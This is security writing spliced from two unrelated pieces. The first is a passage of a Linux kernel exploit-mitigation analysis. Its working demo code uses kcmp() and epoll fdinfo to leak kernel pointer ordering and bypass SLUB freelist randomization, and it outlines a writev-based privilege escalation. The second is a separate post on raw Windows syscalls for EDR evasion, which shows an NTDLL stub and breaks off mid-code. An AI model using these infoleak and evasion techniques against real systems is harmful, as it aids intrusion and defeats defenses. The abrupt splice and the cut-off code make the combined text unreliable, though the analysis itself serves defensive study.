Unfortunately, even a deterministic use-after-free mitigation often won't be enough to deterministically limit the blast radius of something like a refcounting mistake to the object in which it occurred. Consider a case where two codepaths concurrently operate on the same object: Codepath A assumes that the object is live and subject to normal locking rules. Codepath B knows that the reference count reached zero, assumes that it therefore has exclusive access to the object (meaning all members are mutable without any locking requirements), and is trying to tear down the object. Codepath B might then start dropping references the object was holding on other objects while codepath A is following the same references. This could then lead to use-after-frees on pointed-to objects. If all data structures are subject to the same mitigation, this might not be too much of a problem; but if some data structures (like struct page) are not protected, it might permit a mitigation bypass.

Similar issues apply to data structures with union members that are used in different object states; for example, here's some random kernel data structure with an rcu_head in a union (just a random example, there isn't anything wrong with this code as far as I know):

struct allowedips_node {
    struct wg_peer __rcu *peer;
    struct allowedips_node __rcu *bit[2];
    /* While it may seem scandalous that we waste space for v4,
     * we're alloc'ing to the nearest power of 2 anyway, so this
     * doesn't actually make a difference.
     */
    u8 bits[16] __aligned(__alignof(u64));
    u8 cidr, bit_at_a, bit_at_b, bitlen;

    /* Keep rarely used list at bottom to be beyond cache line. */
    union {
        struct list_head peer_list;
        struct rcu_head rcu;
    };
};

As long as everything is working properly, the peer_list member is only used while the object is live, and the rcu member is only used after the object has been scheduled for delayed freeing; so this code is completely fine. But if a bug somehow caused the peer_list to be read after the rcu member has been initialized, type confusion would result.

In my opinion, this demonstrates that while UAF mitigations do have a lot of value (and would have reliably prevented exploitation of this specific bug), a use-after-free is just one possible consequence of the symptom class "object state confusion" (which may or may not be the same as the bug class of the root cause). It would be even better to enforce rules on object states, and ensure that an object e.g. can't be accessed through a "refcounted" reference anymore after the refcount has reached zero and has logically transitioned into a state like "non-RCU members are exclusively owned by thread performing teardown" or "RCU callback pending, non-RCU members are uninitialized" or "exclusive access to RCU-protected members granted to thread performing teardown, other members are uninitialized". Of course, doing this as a runtime mitigation would be even costlier and messier than a reliable UAF mitigation; this level of protection is probably only realistic with at least some level of annotations and static validation.

Against UAF access: Probabilistic UAF mitigation; pointer leaks

Summary: Some types of probabilistic UAF mitigation break if the attacker can leak information about pointer values; and information about pointer values easily leaks to userspace, e.g. through pointer comparisons in map/set-like structures.

If a deterministic UAF mitigation is too costly, an alternative is to do it probabilistically; for example, by tagging pointers with a small number of bits that are checked against object metadata on access, and then changing that object metadata when objects are freed.
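
As a toy illustration of such a scheme (purely a sketch; real implementations, like hardware memory tagging, differ in the details), consider tag bits stored in the unused top bits of a pointer and checked against per-slot metadata on each access:

#include <stdint.h>
#include <assert.h>

#define TAG_SHIFT 56
#define TAG_MASK  0xffULL

typedef struct { uint8_t tag; } slot_meta; /* per-slot metadata */

static void *tag_ptr(void *p, uint8_t tag) {
  return (void *)(((uintptr_t)p & ~(TAG_MASK << TAG_SHIFT))
                  | ((uintptr_t)tag << TAG_SHIFT));
}

static void *check_and_strip(void *tagged, slot_meta *meta) {
  uint8_t tag = ((uintptr_t)tagged >> TAG_SHIFT) & TAG_MASK;
  assert(tag == meta->tag); /* dangling access detected (probabilistically) */
  return (void *)((uintptr_t)tagged & ~(TAG_MASK << TAG_SHIFT));
}

int main(void) {
  static long storage;              /* stand-in for an allocator slot */
  slot_meta meta = { .tag = 1 };
  void *p = tag_ptr(&storage, meta.tag);
  check_and_strip(p, &meta);        /* fine while the object is live */
  meta.tag++;                       /* "free": metadata tag changes */
  check_and_strip(p, &meta);        /* dangling use: the assert fires */
  return 0;
}

An attacker who can learn (or infer through comparisons) the tag bits of a dangling pointer can defeat exactly this kind of check, which is what the rest of this section is about.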

The downside of this approach is that information leaks can be used to break the protection. One example of a type of information leak that I'd like to highlight (without any judgment on the relative importance of this compared to other types of information leaks) are intentional pointer comparisons, which have quite a few facets.

A relatively straightforward example where this could be an issue is the kcmp() syscall. This syscall compares two kernel objects using an arithmetic comparison of their permuted pointers (using a per-boot randomized permutation, see kptr_obfuscate()) and returns the result of the comparison (smaller, equal or greater). This gives userspace a way to order handles to kernel objects (e.g. file descriptors) based on the identities of those kernel objects (e.g. struct file instances), which in turn allows userspace to group a set of such handles by backing kernel object in O(n*log(n)) time using a standard sorting algorithm.
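
For illustration, here is what that looks like from userspace (kcmp() has no glibc wrapper, so it is invoked via syscall(); return value 0 means both handles refer to the same kernel object, while 1 and 2 encode the two possible orderings):

#define _GNU_SOURCE
#include <linux/kcmp.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>

static int kcmp_files(pid_t pid, int fd1, int fd2) {
  return syscall(SYS_kcmp, pid, pid, KCMP_FILE, fd1, fd2);
}

int main(void) {
  int a = open("/etc/passwd", O_RDONLY);
  int b = dup(a);                        /* same struct file as a */
  int c = open("/etc/passwd", O_RDONLY); /* a distinct struct file */
  printf("a vs b: %d (same object)\n", kcmp_files(getpid(), a, b));
  printf("a vs c: %d (ordering of obfuscated pointers)\n",
         kcmp_files(getpid(), a, c));
  return 0;
}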

This syscall can be abused for improving the reliability of use-after-free exploits against some struct types because it checks whether two pointers to kernel objects are equal without accessing those objects: An attacker can allocate an object, somehow create a reference to the object that is not counted properly, free the object, reallocate it, and then verify whether the reallocation indeed reused the same address by comparing the dangling reference and a reference to the new object with kcmp(). If kcmp() includes the pointer's tag bits in the comparison, this would likely also permit breaking probabilistic UAF mitigations.

Essentially the same concern applies when a kernel pointer is encrypted and then given to userspace in fuse_lock_owner_id(), which encrypts the pointer to a files_struct with an open-coded version of XTEA before passing it to a FUSE daemon.

In both these cases, explicitly stripping tag bits would be an acceptable workaround because a pointer without tag bits still uniquely identifies a memory location; and given that these are very special interfaces that intentionally expose some degree of information about kernel pointers to userspace, it would be reasonable to adjust this code manually.

A somewhat more interesting example is the behavior of this piece of userspace code:

#define _GNU_SOURCE
#include <sys/epoll.h>
#include <sys/eventfd.h>
#include <sys/resource.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

int main(void) {
  struct rlimit rlim;
  SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim));
  rlim.rlim_cur = rlim.rlim_max;
  SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim));

  cpu_set_t cpuset;
  CPU_ZERO(&cpuset);
  CPU_SET(0, &cpuset);
  SYSCHK(sched_setaffinity(0, sizeof(cpuset), &cpuset));

  int epfd = SYSCHK(epoll_create1(0));
  for (int i=0; i<1000; i++)
    SYSCHK(eventfd(0, 0));
  for (int i=0; i<192; i++) {
    int fd = SYSCHK(eventfd(0, 0));
    struct epoll_event event = {
      .events = EPOLLIN,
      .data = { .u64 = i }
    };
    SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event));
  }

  char cmd[100];
  sprintf(cmd, "cat /proc/%d/fdinfo/%d", getpid(), epfd);
  system(cmd);
}

It first creates a ton of eventfds that aren't used. Then it creates a bunch more eventfds and creates epoll watches for them, in creation order, with a monotonically incrementing counter in the "data" field. Afterwards, it asks the kernel to print the current state of the epoll instance, which comes with a list of all registered epoll watches, including the value of the data member (in hex). But how is this list sorted? Here's the result of running that code in an Ubuntu 20.10 VM (truncated, because it's a bit long):

user@ubuntuvm:~/epoll_fdinfo$ ./epoll_fdinfo 
pos:    0
flags:  02
mnt_id: 14
tfd:     1040 events:       19 data:               24  pos:0 ino:2f9a sdev:d
tfd:     1050 events:       19 data:               2e  pos:0 ino:2f9a sdev:d
tfd:     1024 events:       19 data:               14  pos:0 ino:2f9a sdev:d
tfd:     1029 events:       19 data:               19  pos:0 ino:2f9a sdev:d
tfd:     1048 events:       19 data:               2c  pos:0 ino:2f9a sdev:d
tfd:     1042 events:       19 data:               26  pos:0 ino:2f9a sdev:d
tfd:     1026 events:       19 data:               16  pos:0 ino:2f9a sdev:d
tfd:     1033 events:       19 data:               1d  pos:0 ino:2f9a sdev:d
[...]

The data: field here is the loop index we stored in the .data member, formatted as hex. Here is the complete list of the data values in decimal:

36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19, 95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110, 12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10, 135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118, 66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81, 177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160, 186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184

While these look sort of random, you can see that the list can be split into blocks of length 32 that consist of shuffled contiguous sequences of numbers:

Block 1 (32 values in range 19-50):
36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19

Block 2 (32 values in range 83-114):
95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110

Block 3 (19 values in range 0-18):
12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10

Block 4 (32 values in range 115-146):
135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118

Block 5 (32 values in range 51-82):
66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81

Block 6 (32 values in range 147-178):
177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160

Block 7 (13 values in range 179-191):
186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184

What's going on here becomes clear when you look at the data structures epoll uses internally. ep_insert calls ep_rbtree_insert to insert a struct epitem into a red-black tree (a type of sorted binary tree); and this red-black tree is sorted using a tuple of a struct file * and a file descriptor number:

/* Compare RB tree keys */
static inline int ep_cmp_ffd(struct epoll_filefd *p1,
                             struct epoll_filefd *p2)
{
        return (p1->file > p2->file ? +1:
                (p1->file < p2->file ? -1 : p1->fd - p2->fd));
}

So the values we're seeing have been ordered based on the virtual address of the corresponding struct file; and SLUB allocates struct file from order-1 pages (i.e. pages of size 8 KiB), which can hold 32 objects each:

root@ubuntuvm:/sys/kernel/slab/filp# cat order 
1
root@ubuntuvm:/sys/kernel/slab/filp# cat objs_per_slab 
32
root@ubuntuvm:/sys/kernel/slab/filp# 

This explains the grouping of the numbers we saw: Each block of 32 contiguous values corresponds to an order-1 page that was previously empty and is used by SLUB to allocate objects until it becomes full.

With that knowledge, we can transform those numbers a bit, to show the order in which objects were allocated inside each page (excluding pages for which we haven't seen all allocations):

$ cat slub_demo.py 
#!/usr/bin/env python3
blocks = [
  [ 36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19 ],
  [ 95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110 ],
  [ 12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10 ],
  [ 135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118 ],
  [ 66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81 ],
  [ 177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160 ],
  [ 186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184 ]
]

for alloc_indices in blocks:
  if len(alloc_indices) != 32:
    continue
  # indices of allocations ('data'), sorted by memory location, shifted to be relative to the block
  alloc_indices_relative = [position - min(alloc_indices) for position in alloc_indices]
  # reverse mapping: memory locations of allocations,
  # sorted by index of allocation ('data').
  # if we've observed all allocations in a page,
  # these will really be indices into the page.
  memory_location_by_index = [alloc_indices_relative.index(idx) for idx in range(0, len(alloc_indices))]
  print(memory_location_by_index)
$ ./slub_demo.py 
[31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17]
[16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2, 20, 6, 14]
[23, 30, 17, 31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27]
[20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2]
[5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15]

And these sequences are almost the same, except that they have been rotated around by different amounts. This is exactly the SLUB freelist randomization scheme, as introduced in commit 210e7a43fa905!

When a SLUB kmem_cache is created (an instance of the SLUB allocator for a specific size class and potentially other specific attributes, usually initialized at boot time), init_cache_random_seq and cache_random_seq_create fill an array ->random_seq with randomly-ordered object indices via Fisher-Yates shuffle, with the array length equal to the number of objects that fit into a page. Then, whenever SLUB grabs a new page from the lower-level page allocator, it initializes the page freelist using the indices from ->random_seq, starting at a random index in the array (and wrapping around when the end is reached). (I'm ignoring the low-order allocation fallback here.)
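
The following userspace simulation (an illustrative sketch, not the actual kernel code) shows why this produces the pattern above: every page served from the same kmem_cache uses the same shuffled sequence, just rotated by a different starting offset.

#include <stdio.h>
#include <stdlib.h>

#define OBJS_PER_SLAB 8

static unsigned int random_seq[OBJS_PER_SLAB];

/* Analogous to cache_random_seq_create(): one Fisher-Yates shuffle
 * per cache, at cache creation time. */
static void shuffle_seq(void) {
  for (unsigned int i = 0; i < OBJS_PER_SLAB; i++)
    random_seq[i] = i;
  for (unsigned int i = OBJS_PER_SLAB - 1; i > 0; i--) {
    unsigned int j = rand() % (i + 1);
    unsigned int tmp = random_seq[i];
    random_seq[i] = random_seq[j];
    random_seq[j] = tmp;
  }
}

int main(void) {
  srand(1234);
  shuffle_seq();
  for (int page = 0; page < 3; page++) {        /* three fresh slab pages */
    unsigned int start = rand() % OBJS_PER_SLAB; /* random start index */
    printf("page %d freelist order:", page);
    for (unsigned int i = 0; i < OBJS_PER_SLAB; i++)
      printf(" %u", random_seq[(start + i) % OBJS_PER_SLAB]);
    printf("\n");
  }
  return 0;
}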

So in summary, we can bypass SLUB randomization for the slab from which struct file is allocated because someone used it as a lookup key in a specific type of data structure. This is already fairly undesirable if SLUB randomization is supposed to provide protection against some types of local attacks for all slabs.

The heap-randomization-weakening effect of such data structures is not necessarily limited to cases where elements of the data structure can be listed in-order by userspace: If there was a codepath that iterated through the tree in-order and freed all tree nodes, that could have a similar effect, because the objects would be placed on the allocator's freelist sorted by address, cancelling out the randomization. In addition, you might be able to leak information about iteration order through cache side channels or such.

If we introduce a probabilistic use-after-free mitigation that relies on attackers not being able to learn whether the uppermost bits of an object's address changed after it was reallocated, this data structure could also break that. This case is messier than things like kcmp() because here the address ordering leak stems from a standard data structure.

You may have noticed that some of the examples I'm using here would be more or less limited to cases where an attacker is reallocating memory with the same type as the old allocation, while a typical use-after-free attack ends up replacing an object with a differently-typed one to cause type confusion. As an example of a bug that can be exploited for privilege escalation without type confusion at the C structure level, see entry 808 in our bugtracker. My exploit for that bug first starts a writev() operation on a writable file, lets the kernel validate that the file is indeed writable, then replaces the struct file with a read-only file pointing to /etc/crontab, and lets writev() continue. This allows gaining root privileges through a use-after-free bug without having to mess around with kernel pointers, data structure layouts, ROP, or anything like that. Of course that approach doesn't work with every use-after-free though.

(By the way: For an example of pointer leaks through container data structures in a JavaScript engine, see this bug I reported to Firefox back in 2016, when I wasn't a Google employee, which leaks the low 32 bits of a pointer by timing operations on pessimal hash tables - basically turning the HashDoS attack into an infoleak. Of course, nowadays, a side-channel-based pointer leak in a JS engine would probably not be worth treating as a security bug anymore, since you can probably get the same result with Spectre...)

Against freeing SLUB pages: Preventing virtual address reuse beyond the slab

(Also discussed a little bit on the kernel-hardening list in this thread.)

A weaker but less CPU-intensive alternative to trying to provide complete use-after-free protection for individual objects would be to ensure that virtual addresses that have been used for slab memory are never reused outside the slab, but that physical pages can still be reused. This would be the same basic approach as used by PartitionAlloc and others. In kernel terms, that would essentially mean serving SLUB allocations from vmalloc space.

Some challenges I can think of with this approach are:

  • SLUB allocations are currently served from the linear mapping, which normally uses hugepages; if vmalloc mappings with 4K PTEs were used instead, TLB pressure might increase, which might lead to some performance degradation.
  • To be able to use SLUB allocations in contexts that operate directly on physical memory, it is sometimes necessary for SLUB pages to be physically contiguous. That's not really a problem, but it is different from default vmalloc behavior. (Sidenote: DMA buffers don't always have to be physically contiguous - if you have an IOMMU, you can use that to map discontiguous pages to a contiguous DMA address range, just like how normal page tables create virtually-contiguous memory. See this kernel-internal API for an example that makes use of this, and Fuchsia's documentation for a high-level overview of how all this works in general.)
  • Some parts of the kernel convert back and forth between virtual addresses, struct page pointers, and (for interaction with hardware) physical addresses. This is a relatively straightforward mapping for addresses in the linear mapping, but would become a bit more complicated for vmalloc addresses. In particular, page_to_virt() and phys_to_virt() would have to be adjusted.
    • This is probably also going to be an issue for things like Memory Tagging, since pointer tags will have to be reconstructed when converting back to a virtual address. Perhaps it would make sense to forbid these helpers outside low-level memory management, and change existing users to instead keep a normal pointer to the allocation around? Or maybe you could let pointers to struct page carry the tag bits for the corresponding virtual address in unused/ignored address bits?

The probability that this defense can prevent UAFs from leading to exploitable type confusion depends somewhat on the granularity of slabs; if specific struct types have their own slabs, it provides more protection than if objects are only grouped by size. So to improve the utility of virtually-backed slab memory, it would be necessary to replace the generic kmalloc slabs (which contain various objects, grouped only by size) with ones that are segregated by type and/or allocation site. (The grsecurity/PaX folks have vaguely alluded to doing something roughly along these lines using compiler instrumentation.)

After reallocation as pagetable: Structure layout randomization

Memory safety issues are often exploited in a way that involves creating a type confusion; e.g. exploiting a use-after-free by replacing the freed object with a new object of a different type.

A defense that first appeared in grsecurity/PaX is to shuffle the order of struct members at build time to make it harder to exploit type confusions involving structs; the upstream Linux version of this is in scripts/gcc-plugins/randomize_layout_plugin.c.

How effective this is depends partly on whether the attacker is forced to exploit the issue as a confusion between two structs, or whether the attacker can instead exploit it as a confusion between a struct and an array (e.g. containing characters, pointers or PTEs). Especially if only a single struct member is accessed, a struct-array confusion might still be viable by spraying the entire array with identical elements. Against the type confusion described in this blogpost (between struct pid and page table entries), structure layout randomization could still be somewhat effective, since the reference count is half the size of a PTE and therefore can randomly be placed to overlap either the lower or the upper half of a PTE. (Except that the upstream Linux version of randstruct only randomizes explicitly-marked structs or structs containing only function pointers, and struct pid has no such marking.)
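
For reference, opting a struct in to the upstream randstruct plugin looks like the fragment below (kernel code, not standalone-compilable; the struct itself is made up for illustration). Without such a marker, and without consisting purely of function pointers, a struct like struct pid keeps its declared layout.

struct hypothetical_object {
        unsigned int count;
        unsigned int level;
        void *tasks[3];
} __randomize_layout;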

Of course, drawing a clear distinction between structs and arrays oversimplifies things a bit; for example, there might be struct types that have a large number of pointers of the same type or attacker-controlled values, not unlike an array.

If the attacker can not completely sidestep structure layout randomization by spraying the entire struct, the level of protection depends on how kernel builds are distributed:

  • If the builds are created centrally by one vendor and distributed to a large number of users, an attacker who wants to be able to compromise users of this vendor would have to rework their exploit to use a different type confusion for each release, which may force the attacker to rewrite significant chunks of the exploit.
  • If the kernel is individually built per machine (or similar), and the kernel image is kept secret, an attacker who wants to reliably exploit a target system may be forced to somehow leak information about some structure layouts and either prepare exploits for many different possible struct layouts in advance or write parts of the exploit interactively after leaking information from the target system.

To maximize the benefit of structure layout randomization in an environment where kernels are built centrally by a distribution/vendor, it would be necessary to make randomization a boot-time process by making structure offsets relocatable. (Or install-time, but that would break code signing.) Doing this cleanly (for example, such that 8-bit and 16-bit immediate displacements can still be used for struct member access where possible) would probably require a lot of fiddling with compiler internals, from the C frontend all the way to the emission of relocations. A somewhat hacky version of this approach already exists for C->BPF compilation as BPF CO-RE, using the clang builtin __builtin_preserve_access_index, but that relies on debuginfo, which probably isn't a very clean approach.

Potential issues with structure layout randomization are:

  • If structures are hand-crafted to be particularly cache-efficient, fully randomizing structure layout could worsen cache behavior. The existing randstruct implementation optionally avoids this by trying to randomize only within a cache line.
  • Unless the randomization is applied in a way that is reflected in DWARF debug info and such (which it isn't in the existing GCC-based implementation), it can make debugging and introspection harder.
  • It can break code that makes assumptions about structure layout; but such code is gross and should be cleaned up anyway (and Gustavo Silva has been working on fixing some of those issues).

While structure layout randomization by itself is limited in its effectiveness by struct-array confusions, it might be more reliable in combination with limited heap partitioning: If the heap is partitioned such that only struct-struct confusion is possible, and structure layout randomization makes struct-struct confusion difficult to exploit, and no struct in the same heap partition has array-like properties, then it would probably become much harder to directly exploit a UAF as type confusion. On the other hand, if the heap is already partitioned like that, it might make more sense to go all the way with heap partitioning and create one partition per type instead of dealing with all the hassle of structure layout randomization.

(By the way, if structure layouts are randomized, padding should probably also be randomized explicitly instead of always being on the same side to maximally randomize structure members with low alignment; see my mailing list post on this topic for details.)

Control Flow Integrity

I want to explicitly point out that kernel Control Flow Integrity would have had no impact at all on this exploit strategy. By using a data-only strategy, we avoid having to leak addresses, avoid having to find ROP gadgets for a specific kernel build, and are completely unaffected by any defenses that attempt to protect kernel code or kernel control flow. Things like getting access to arbitrary files, increasing the privileges of a process, and so on don't require kernel instruction pointer control.

Like in my last blogpost on Linux kernel exploitation (which was about a buggy subsystem that an Android vendor added to their downstream kernel), to me, a data-only approach to exploitation feels very natural and seems less messy than trying to hijack control flow anyway.

Maybe things are different for userspace code; but for attacks by userspace against the kernel, I don't currently see a lot of utility in CFI because it typically only affects one of many possible methods for exploiting a bug. (Although of course there could be specific cases where a bug can only be exploited by hijacking control flow, e.g. if a type confusion only permits overwriting a function pointer and none of the permitted callees make assumptions about input types or privileges that could be broken by changing the function pointer.)

Making important data readonly

A defense idea that has shown up in a bunch of places (including Samsung phone kernels and XNU kernels for iOS) is to make data that is crucial to kernel security read-only except when it is intentionally being written to - the idea being that even if an attacker has an arbitrary memory write, they should not be able to directly overwrite specific pieces of data that are of exceptionally high importance to system security, such as credential structures, page tables, or (on iOS, using PPL) userspace code pages.

The problem I see with this approach is that a large portion of the things a kernel does are, in some way, critical to the correct functioning of the system and system security. MMU state management, task scheduling, memory allocation, filesystems, page cache, IPC, ... - if any one of these parts of the kernel is corrupted sufficiently badly, an attacker will probably be able to gain access to all user data on the system, or use that corruption to feed bogus inputs into one of the subsystems whose own data structures are read-only.

In my view, instead of trying to split out the most critical parts of the kernel and run them in a context with higher privileges, it might be more productive to go in the opposite direction and try to approximate something like a proper microkernel: Split out drivers that don't strictly need to be in the kernel and run them in a lower-privileged context that interacts with the core kernel through proper APIs. Of course that's easier said than done! But Linux does already have APIs for safely accessing PCI devices (VFIO) and USB devices from userspace, although userspace drivers aren't exactly its main usecase.

(One might also consider making page tables read-only not because of their importance to system integrity, but because the structure of page table entries makes them nicer to work with in exploits that are constrained in what modifications they can make to memory. I dislike this approach because I think it has no clear conclusion and it is highly invasive regarding how data structures can be laid out.)

Conclusion

This was essentially a boring locking bug in some random kernel subsystem that, if it wasn't for memory unsafety, shouldn't really have much of a relevance to system security. I wrote a fairly straightforward, unexciting (and admittedly unreliable) exploit against this bug; and probably the biggest challenge I encountered when trying to exploit it on Debian was to properly understand how the SLUB allocator works.

My intent in describing the exploit stages, and how different mitigations might affect them, is to highlight that the further a memory corruption exploit progresses, the more options an attacker gains; and so as a general rule, the earlier an exploit is stopped, the more reliable the defense is. Therefore, even if defenses that stop an exploit at an earlier point have higher overhead, they might still be more useful.

I think that the current situation of software security could be dramatically improved - in a world where a little bug in some random kernel subsystem can lead to a full system compromise, the kernel can't provide reliable security isolation. Security engineers should be able to focus on things like buggy permission checks and core memory management correctness, and not have to spend their time dealing with issues in code that ought to not have any relevance to system security.

In the short term, there are some band-aid mitigations that could be used to improve the situation - like heap partitioning or fine-grained UAF mitigation. These might come with some performance cost, and that might make them look unattractive; but I still think that they're a better place to invest development time than things like CFI, which attempts to protect against much later stages of exploitation.

In the long term, I think something has to change about the programming language - plain C is simply too error-prone. Maybe the answer is Rust; or maybe the answer is to introduce enough annotations to C (along the lines of Microsoft's Checked C project, although as far as I can see they mostly focus on things like array bounds rather than temporal issues) to allow Rust-equivalent build-time verification of locking rules, object states, refcounting, void pointer casts, and so on. Or maybe another completely different memory-safe language will become popular in the end, neither C nor Rust?

My hope is that perhaps in the mid-term future, we could have a statically verified, high-performance core of kernel code working together with instrumented, runtime-verified, non-performance-critical legacy code, such that developers can make a tradeoff between investing time into backfilling correct annotations and run-time instrumentation slowdown without compromising on security either way.

TL;DR

memory corruption is a big problem because small bugs even outside security-related code can lead to a complete system compromise; and to address that, it is important that we:

  • in the short to medium term:

    • design new memory safety mitigations:
      • ideally, that can stop attacks at an early point where attackers don't have a lot of alternate options yet
        • maybe at the memory allocator level (i.e. SLUB)
      • that can't be broken using address tag leaks (or we try to prevent tag leaks, but that's really hard)
    • continue using attack surface reduction
      • in particular seccomp
    • explicitly prevent untrusted code from gaining important attack primitives
      • like FUSE, and potentially consider fine-grained scheduler control
  • in the long term:

    • statically verify correctness of most performance-critical code
      • this will require determining how to retrofit annotations for object state and locking onto legacy C code
      • consider designing runtime verification just for gaps in static verification

the fanciful allure and utility of syscalls

12 May 2021 at 21:10

So over the years I’ve had a number of conversations about the utility of using syscalls in shellcode, C2s, or loaders in offsec tooling and red team ops. For reasons likely related to the increasing maturity of EDRs and their totalitarian grip in enterprise environments, I’ve seen an uptick in projects and blogs championing “raw syscalls” as a technique for evading AV/SIEM technologies. This post is an attempt to describe why I think the technique’s efficacy has been overstated and its utility stretched thin.

This diatribe is not meant to denigrate any one project or its utility; if your tool or payload uses syscalls instead of ntdll, great. The technique is useful under certain circumstances and can be valuable in attempts at evading EDR, particularly when combined with other strategies. What it’s not, however, is a silver bullet. It is not going to grant you any particularly interesting capability by virtue of evading a vendor data sink. Determining its efficacy in context of the execution chain is difficult, ambiguous at best. Your C2 is not advanced in EDR evasion by including a few ntdll stubs.

Note that when I’m talking about EDRs, I’m speaking specifically to modern samples with online and cloud-based machine learning capabilities, both attended and unattended. CrowdStrike Falcon, Cylance, Cybereason, Endgame, Carbon Black, and others have a wide array of ML strategies of varying quality. This post is not an analysis of these vendors’ user mode hooking capabilities.

Finally, this discussion’s perspective is that of post-exploitation, necessary for an attacker to issue a syscall anyway. User mode hooks can provide useful telemetry on user behavior prior to code execution (phishing stages), but once that’s achieved, all bets of process integrity are off.

syscalling

Very briefly, using raw syscalls is an old technique that obviates the need to use sanctioned APIs and instead uses assembly to execute certain functions exposed to user mode from the kernel. For example, if you wanted to read memory of another process, you might use NtReadVirtualMemory:

NtReadVirtualMemory(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToRead, NumberOfBytesReaded);

This function is exported by NTDLL; at runtime, the PE loader loads every DLL in its import directory table, then resolves all of the import address table (IAT) function pointers. When we call NtReadVirtualMemory, the call goes through the resolved IAT pointer and lands on the following stub:

00007ffb`1676d4f0 4c8bd1           mov     r10, rcx
00007ffb`1676d4f3 b83f000000       mov     eax, 3Fh
00007ffb`1676d4f8 f604250803fe7f01 test    byte ptr [SharedUserData+0x308 (00000000`7ffe0308)], 1
00007ffb`1676d500 7503             jne     ntdll!NtReadVirtualMemory+0x15 (00007ffb`1676d505)
00007ffb`1676d502 0f05             syscall 
00007ffb`1676d504 c3               ret     
00007ffb`1676d505 cd2e             int     2Eh
00007ffb`1676d507 c3               ret 

This stub, implemented in NTDLL, moves the syscall number (0x3f) into EAX and then transitions to the kernel via syscall (or int 2Eh, if the flag it checks in SharedUserData is set). At this point the kernel begins executing the routine tied to code 0x3f. There are plenty of resources on how the process works and what happens on the way back, so please refer elsewhere.
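
For concreteness, a hand-rolled equivalent of that stub might look like the sketch below (GCC/Clang file-scope assembly targeting x64 MinGW; the immediate 0x3f is taken from the disassembly above and, as discussed below, is build-dependent):

/* Windows x64 syscall convention: the kernel expects the first
 * argument in r10 and the syscall number in eax. */
asm(".globl SysNtReadVirtualMemory\n"
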